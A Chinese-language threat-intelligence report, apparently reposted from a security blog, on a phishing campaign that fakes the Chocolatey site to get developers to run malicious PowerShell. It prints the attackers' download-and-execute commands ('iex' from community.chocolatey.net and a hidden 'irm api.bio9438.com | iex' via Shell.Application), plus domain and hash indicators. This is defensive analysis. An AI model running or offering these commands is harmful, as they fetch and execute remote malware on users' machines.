文章总结： 近期出现针对Windows开发者的新型钓鱼攻击，攻击者仿冒Chocolatey包管理器官网诱导用户执行恶意PowerShell脚本，通过Shell.ApplicationCOM对象隐藏执行多级载荷投递。该活动与此前伪装GeminiCLI的攻击同源，均针对技术人群利用命令行信任链，采用字符串混淆、数学运算等手段规避检测。文档提供了完整攻击链路、技术细节及IOCs（含5个恶意域名和4个文件哈希），建议安全团队及时更新威胁指标并加强终端监控。 综合评分： 87 文章分类： 威胁情报,恶意软件,社会工程学,渗透测试,漏洞预警

伪装成 Windows 包管理器 Chocolatey 的新型恶意软件攻击活动威胁情报

TtTeam

2026年5月8日 13:28 海南

在小说阅读器读本章

去阅读

以下文章来源于Khan安全团队 ，作者忍者

Khan安全团队 .

安全不是一个人，我们来自五湖四海。研究方向Web内网渗透，免杀技术，红蓝攻防对抗，CTF。

近期，针对 Windows 平台开发者与运维人员的新型钓鱼攻击活动活跃，攻击者通过仿冒知名 Windows 包管理器Chocolatey的官方网站，诱导用户执行恶意 PowerShell 脚本，实现多级载荷投递与系统入侵。该活动与此前伪装 Google Gemini CLI 的攻击手法高度同源，精准瞄准技术人群，利用命令行安装信任链实施欺骗。

一、攻击概况

#

攻击者注册 chocolatey.co.com、chocolatey.net 等仿冒域名，搭建与 Chocolatey 官方界面高度一致的钓鱼站点，以 “官方一键安装脚本” 为诱饵，诱导技术用户执行远程 PowerShell 下载命令。受害主机执行脚本后，会在后台静默加载多层恶意载荷，最终向系统植入恶意程序。

该攻击与此前伪装 Gemini CLI 的活动存在明显关联：

• 均采用仿冒知名开发工具的社会工程学手段
• 核心恶意逻辑复用 Shell.Application COM 对象隐藏执行 PowerShell
• 载荷投递链路与混淆代码手法高度相似
• 部分恶意域名与脚本结构存在重叠，推测为同一威胁组织所为

#

#

二、攻击链路与技术细节

#

1. 钓鱼站点诱导阶段

#

攻击者通过搜索引擎优化等手段，将仿冒站点 chocolatey.co.com、chocolatey.net 推送到搜索结果前列，页面标题、Logo、功能描述均模仿官方站点 chocolatey.org，并提供伪装的安装命令：

[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; iex ((New-Object System.Net.WebClient).DownloadString('https://community.chocolatey.net/install.ps1'))

该命令模仿官方安装脚本格式，诱导用户直接在终端执行，利用 iex 实现远程代码执行。

2. 初始脚本加载阶段

#

用户执行命令后，会从

community.chocolatey.net下载

install.ps1 脚本

（SHA256: b7f71a5a2df2aa38c1a4229cb16df0a123eb73923e6e0699c2a177f9e2e63d88）

• 伪装行为

保留部分 Chocolatey 安装函数注释，伪装成正常安装脚本

• 核心恶意行为

  通过 Shell.Application COM 对象执行隐藏 PowerShell 命令，在后台静默加载第二阶段载荷：

$BindingRef = New-Object -ComObject "Shell.Application";$BindingRef.ShellExecute("powershell", '"irm api.bio9438.com | iex"', $null, "open", 0);

3. 多级载荷投递阶段

#

第二阶段脚本从 api.bio9438.com 加载后，通过字符串混淆、数学运算、子串截取等方式解析恶意代码，进一步投递后续载荷：

• 混淆代码特征：将关键字符串拆分为多个片段，通过复杂运算拼接还原，规避静态特征检测
• 载荷来源域名：api.bio9438.com、olive3451.com，分别投递不同阶段恶意脚本（如 /run/dIG1bXo3 路径下的 payload、start.ps1）
• 已知恶意文件哈希：

api.bio9438.com主脚本：aeb622aadf8cba10da94773346cfa65eff76a4ad958dd9e2ef6c3109f95e4d28/run/dIG1bXo3载荷：feccbcb1e8c4f1e73c4029ca393d1c782434fc2a9a4f36d615845a49b458cf2colive3451.com/start.ps1：200646480d8b71e43aa940343ea546362565f7c61df11c9f74cec625794e9052

4. 攻击关联分析

#

该活动与此前伪装 Gemini CLI 的攻击存在高度关联性：

• 攻击目标均为开发者 / 运维人员，利用技术人群对命令行安装的信任
• 核心恶意逻辑均为 Shell.Application COM 对象 + 隐藏 PowerShell 执行
• 载荷投递链路、混淆代码手法、域名注册模式高度一致
• 推测为同一威胁组织针对开发工具生态的持续攻击

三、威胁指标（IOCs）

#

1. 恶意域名

#

| 域名 | 用途 | | — | — | | chocolatey.co.com | 钓鱼站点，初始诱导 | | chocolatey.net | 钓鱼站点，托管恶意安装脚本 | | community.chocolatey.net | 托管 install.ps1 初始恶意脚本 | | api.bio9438.com | 第二阶段载荷加载、混淆代码载体 | | olive3451.com | 最终 payload 投递（start.ps1） |

2. 恶意文件哈希（SHA256）

b7f71a5a2df2aa38c1a4229cb16df0a123eb73923e6e0699c2a177f9e2e63d88（community.chocolatey.net/install.ps1）aeb622aadf8cba10da94773346cfa65eff76a4ad958dd9e2ef6c3109f95e4d28（api.bio9438.com 主脚本）feccbcb1e8c4f1e73c4029ca393d1c782434fc2a9a4f36d615845a49b458cf2c（api.bio9438.com/run/dIG1bXo3）200646480d8b71e43aa940343ea546362565f7c61df11c9f74cec625794e9052（olive3451.com/start.ps1）

3. 网络与行为特征

PowerShell 命令特征：irm [恶意域名] | iex 远程下载执行COM 对象调用特征：New-Object -ComObject "Shell.Application" + ShellExecute 无窗口执行伪装行为：模仿知名开发工具（Gemini CLI/Chocolatey）安装流程混淆特征：字符串拆分、数学运算、子串截取组合混淆

四、总结

#

此次攻击是威胁组织针对Windows 开发工具生态的持续钓鱼活动，通过仿冒 Chocolatey、Gemini CLI 等高频使用的开发工具，利用技术人群对命令行安装的信任实施入侵。攻击者通过 COM 对象隐藏执行、多层混淆代码等技术规避检测，后续可能进一步投递信息窃取、远程控制或勒索软件等恶意载荷。安全团队需及时更新 IOCs，加强终端监控，并提升用户对仿冒工具的识别能力。

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：TtTeam 《伪装成 Windows 包管理器 Chocolatey 的新型恶意软件攻击活动威胁情报》